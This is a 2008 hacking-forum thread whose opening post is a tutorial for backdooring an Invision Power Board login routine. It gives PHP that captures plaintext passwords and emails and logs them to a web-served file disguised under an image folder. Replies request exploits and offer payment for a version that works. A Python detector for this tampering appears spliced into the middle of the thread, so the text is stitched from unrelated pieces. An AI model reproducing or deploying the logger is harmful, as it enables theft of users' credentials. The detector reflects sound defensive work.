IT Security and Insecurity Portal |
[IPB][Tutorial]Password logger |
|
Posted: Thu Apr 17, 2008 3:10 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
Tested under:
Invision Power Board 2.3.4
[Requirements]
- Access to the server
Open the "login_core.php", which is located at /IPB-PATH/sources/loginauth.
Search for
Code: | function auth_local( $username, $password ) |
and put the following lines under the function (above the $password = md5($password); line!):
Code: |
$lg_pwd = $password;
|
Then search for
Code: | $this->return_code = 'SUCCESS'; |
(the FIRST $this->return_code, it's about line 331) and put the following lines above the $this->return_code variable:
Code: |
@include("conf_global.php");
$lg_username = strtolower($username);
$lg_password = $lg_pwd;
$lg_file = "./style_images/1/folder_mime_types/lg.html";
$connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
$selectdb = @mysql_select_db($INFO['sql_database']);
$sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
|
Now wait a little bit and see how the file size of the log file rises.
PS: If the logger doesn't create the log file automatically, then you need to create it manually and give the file chmod 0777.
(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru> |
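From the defender's side, the modification described in this post leaves recognisable traces in the authentication source: a copy of `$password` taken before hashing, file writes inside the login routine, and a log path under a web-served image directory. The Python sketch below is an added example, not part of the original post or of IPB; the rule names, both PHP samples and the scoring are constructed for illustration.

```python
import re

# Heuristic rules derived from the modification the post describes.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("plaintext-copy", re.compile(r"\$\w+\s*=\s*\$password\s*;")),
    ("file-write", re.compile(r"\b(fopen|fwrite|fputs|file_put_contents)\s*\(")),
    ("suppressed-call", re.compile(r"@\s*(include|require|fopen|fwrite|fputs|mysql_\w+)\b")),
    ("web-path-log", re.compile(r"""["'][^"']*style_images/[^"']*\.(html?|txt|php)["']""")),
]

# Constructed stand-ins for an auth routine, NOT real IPB source.
CLEAN = """\
function auth_local( $username, $password )
{
    $password = md5( $password );
    $this->return_code = 'SUCCESS';
}
"""

TAMPERED = """\
function auth_local( $username, $password )
{
    $lg_pwd = $password;
    $password = md5( $password );
    $lg_file = "./style_images/1/folder_mime_types/lg.html";
    $fp1 = @fopen($lg_file, "a+");
    @fwrite($fp1, $lg_pwd);
    $this->return_code = 'SUCCESS';
}
"""

def scan_php(source):
    """Return (line_number, rule_name) for every rule hit in PHP source text."""
    return [(no, name)
            for no, line in enumerate(source.splitlines(), 1)
            for name, rx in RULES if rx.search(line)]

def verdict(hits):
    """'high' if a pre-hash password copy co-occurs with a file write."""
    names = {name for _, name in hits}
    if {"plaintext-copy", "file-write"} <= names:
        return "high"
    return "review" if names else "clean"

if __name__ == "__main__":
    for label, src in (("clean", CLEAN), ("tampered", TAMPERED)):
        hits = scan_php(src)
        print(label, verdict(hits), hits)
```

Pattern matching of this kind only catches the unmodified form of the change; comparing hashes of the board's PHP files against a clean copy of the same release, and alerting on non-image files under web-served image directories, is the more reliable control.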
Posted: Thu Apr 17, 2008 6:02 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
In IPB there is another possible solution without access to the server, only admin access. Think. |
Posted: Thu Apr 17, 2008 8:40 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
And?
You need just to edit this file and it really doesn't matter if you edit this file through a shell or through the template system or any other methods.
The coding stuff will be the same, so I don't understand why you try to goof off my works!?
koko wrote: | In IPB there is another possible solution without access to the server, only admin access. Think. |
Posted: Fri Apr 18, 2008 9:38 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
To edit files on the server you need user perms. In 90% you don't have one. |
Posted: Wed Sep 03, 2008 5:46 pm |
|
|
_hacker_ |
Regular user |
|
|
Joined: Aug 26, 2008 |
Posts: 14 |
Location: asia |
Does someone have a 2.3.4 Perl IPB exploit? Because it is easy to use. |
Posted: Wed Sep 03, 2008 8:45 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
Posted: Thu Sep 04, 2008 11:55 am |
|
|
_hacker_ |
Regular user |
|
|
Joined: Aug 26, 2008 |
Posts: 14 |
Location: asia |
Bro, it's a PHP exploit; I don't know how to use a PHP exploit ...
I know only Perl exploits.
There is no difference between Perl and PHP?
For example, if it was Perl, I did these steps to run it:
1: install Perl and save this as ipb.pl
and then go to cmd and then the Perl dir
c:/perl/bin\perl> ipb.pl
Like that. Now what to do, can you explain please? |
Posted: Fri Sep 05, 2008 12:14 am |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
_hacker_ wrote: |
Bro, it's a PHP exploit; I don't know how to use a PHP exploit ...
I know only Perl exploits.
There is no difference between Perl and PHP?
For example, if it was Perl, I did these steps to run it:
1: install Perl and save this as ipb.pl
and then go to cmd and then the Perl dir
c:/perl/bin\perl> ipb.pl
Like that. Now what to do, can you explain please? |
Download xampp (http://www.apachefriends.org/en/xampp-windows.html) and install it.
Then start your command prompt (start -> run -> cmd :p) and type
Path\To\xampp\php\php.exe Path\To\The\Exploit\exploit.php.
I didn't test the PHP exploit, but the script should be writing some options. |
Posted: Tue Jan 13, 2009 2:45 pm |
|
|
waplet |
Active user |
|
|
Joined: Dec 24, 2008 |
Posts: 31 |
I got this !
Code: | $this->return_code = 'SUCCESS';
return; |
But where to put
Code: | @include("conf_global.php");
$lg_username = strtolower($username);
$lg_password = $lg_pwd;
$lg_file = "./style_images/1/folder_mime_types/lg.html";
$connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
$selectdb = @mysql_select_db($INFO['sql_database']);
$sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
} |
this one? I can't understand. I don't want problems with errors. |
Posted: Mon Feb 16, 2009 7:25 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
pexli wrote: | In IPB have other possible solution witout access to server,only admin access.Think. |
How can I do it using the admincp? |
newest ipb |
|
Posted: Mon Oct 05, 2009 5:13 am |
|
|
iiDo |
Regular user |
|
|
Joined: Nov 24, 2007 |
Posts: 19 |
Does anyone have an idea how to log with the newest IPB??
thanks |
Posted: Tue Oct 20, 2009 3:07 pm |
|
|
thelordbug |
Beginner |
|
|
Joined: Oct 20, 2009 |
Posts: 2 |
Paying $20 USD via paypal for this to work for IPB 2.3.6 |
Posted: Sat Dec 05, 2009 2:37 am |
|
|
0x3 |
Regular user |
|
|
Joined: Jun 09, 2009 |
Posts: 10 |
Location: j0rd4n |
This doesn't work; as it looks, you get the password for the user from the DB, so it will be MD5, like
Code: |
jonnye_r : 8bef052c7ae033ad47baab006846438f (j0@j0.com)
|
With vBulletin it works fine [clear text], but IPB needs to get the password without the DB ... so it will be clear text..
So this one is useless, I think...
/j0 |